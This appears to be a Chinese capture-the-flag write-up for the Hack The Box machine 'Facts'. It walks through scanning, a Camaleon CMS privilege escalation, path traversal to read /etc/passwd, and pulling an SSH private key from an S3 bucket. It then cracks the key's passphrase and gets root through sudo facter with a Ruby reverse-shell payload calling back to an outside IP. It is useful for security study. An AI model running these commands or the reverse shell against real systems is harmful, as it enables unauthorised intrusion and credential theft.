HTB赛季10 - Facts

前言

各位小伙伴,赛季10开启了,但是我最近实在太忙,实在没心情将图片拖进来了,可能会影响大家的阅读体验,但这同时也是锻炼各位的机会哈哈哈。之后空闲下来,会恢复文章品质的。Sorry啦。

复制代码
10.129.18.81

nmap扫描

复制代码
sudo nmap --top-ports 10000 10.129.18.81 --min-rate=1000 -oA ips_quick_TCP_nmapscan && sudo nmap --top-ports 10000 10.129.18.81 --min-rate=1000 -sU -oA ips_quick_UDP_nmapscan && nmap -p- 10.129.18.81 -oA ips_full_TCP_nmapscan --min-rate=1000 && sudo nmap -p- 10.129.18.81 -sU -oA ips_full_UDP_nmapscan --min-rate=1000

![[Pasted image 20260201201638.png]]

扫描vhost

复制代码
ffuf -w /home/kali/Desktop/Info/SecLists-master/SecLists-master/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u http://facts.htb/ -H 'Host: FUZZ.facts.htb' -mc all -fw 18

ffuf -w test.txt:FUZZ -u http://facts.htb/FUZZ  -mc all -fw 1248

![[Pasted image 20260201203127.png]]

我们进入/admin页面并创建用户

![[Pasted image 20260201203159.png]]

Camaleon CMS - N day 漏洞 - 任意文件读取 & Web账户提权到Admin

成功进入页面

![[Pasted image 20260201203228.png]]

该页面告诉我们了N day漏洞 https://www.tenable.com/security/research/tra-2025-09 ,经过分析我获取了administrator权限,其只要原因是updated_ajax的权限控制存在缺失导致的,会将所有的password里面的内容全部信任。

![[Pasted image 20260201205350.png]]

![[Pasted image 20260201205337.png]]

我们接着发现了一个桶服务器

![[Pasted image 20260201210833.png]]

我们配置aws准备访问

复制代码
aws configure --profile htb

aws s3 ls --profile htb  --endpoint-url http://10.129.18.81:54321

aws s3 cp s3://internal/.ssh/id_ed25519 ./ --profile htb  --endpoint-url http://10.129.18.81:54321

![[Pasted image 20260201210930.png]]

我们提取一下谁使用这个密钥

复制代码
grep -v '\-\-' id_ed25519|base64 -d|strings

可惜没有任何信息,我们去网页搜集所有用户名

复制代码
Bob
Carol
Dave

我们进一步覆盖authorized_keys

复制代码
aws s3 cp ./authorized_keys s3://internal/.ssh/authorized_keys --profile htb  --endpoint-url http://10.129.18.81:54321

aws s3 ls internal/.ssh/ --profile htb  --endpoint-url http://10.129.18.81:54321

aws s3 ls internal --profile htb  --endpoint-url http://10.129.18.81:54321

aws s3 cp s3://randomfacts/* ./ --profile htb  --endpoint-url http://10.129.18.81:54321

aws s3 sync s3://internal ./internal \
  --profile htb \
  --endpoint-url http://10.129.18.81:54321

我们并没有找到用户名字,我们继续查看CMS的漏洞情况,发现存在路径遍历漏洞

![[Pasted image 20260201220217.png]]

复制代码
http://facts.htb/admin/media/download_private_file?file=../../../../../../etc/passwd

我们尝试登录

![[Pasted image 20260201220246.png]]

复制代码
ssh -i id_ed25519 trivia@facts.htb 

![[Pasted image 20260201220324.png]]

我们在云里面曾经写入了authorized_keys文件,所以我们尝试用自己的私钥登录

复制代码
ssh -i ~/.ssh/id_ed25519 trivia@facts.htb 

aws s3 ls internal/.ssh/ --profile htb  --endpoint-url http://10.129.18.81:54321

我们进一步查看,发现云里面的只是复制内容。我们只能破解id_ed25519

复制代码
ssh2john id_ed25519
john hash --wordlist=/home/kali/Desktop/Info/zhuzhuzxia/Passwords/rockyou.txt

![[Pasted image 20260201220959.png]]

复制代码
dragonballz

我们发现,该指令会执行/tmp目录下的第一个rb文件

复制代码
sudo /usr/bin/facter --custom-dir=/tmp/ x

所以我们编写RB文件放在/tmp下即可

复制代码
#!/usr/bin/env ruby

puts "Hello, Ruby"
spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.17.114",80))

然后执行

复制代码
sudo /usr/bin/facter --custom-dir=/tmp/ x
相关推荐
码云数智-大飞2 小时前
零拷贝 IPC:用内存映射文件打造 .NET 高性能进程间通信队列
java·开发语言·网络
礼拜天没时间.2 小时前
《Docker实战入门与部署指南:从核心概念到网络与数据管理》:环境准备与Docker安装
运维·网络·docker·容器·centos
one____dream2 小时前
Reverse-elrond32
安全·网络安全·ctf
hoududubaba2 小时前
ORAN C平面传输和基本功能——C平面消息的ACK/NACK过程
网络·网络协议
云中飞鸿2 小时前
虚拟机需要连外网,同时笔记本连接wlan,IP经常变,该怎么配置网络?
服务器·网络·tcp/ip
坐怀不乱杯魂2 小时前
Linux 网络 - HTTP -cookie session
网络·网络协议·http
前端世界2 小时前
鸿蒙分布式网络性能优化实战:从通信建连到多设备协同
网络·分布式·harmonyos
小李独爱秋2 小时前
计算机网络经典问题透视:无线局域网MAC协议中的SIFS和DIFS究竟是什么?
网络协议·计算机网络·macos·网络安全·信息与通信·信号处理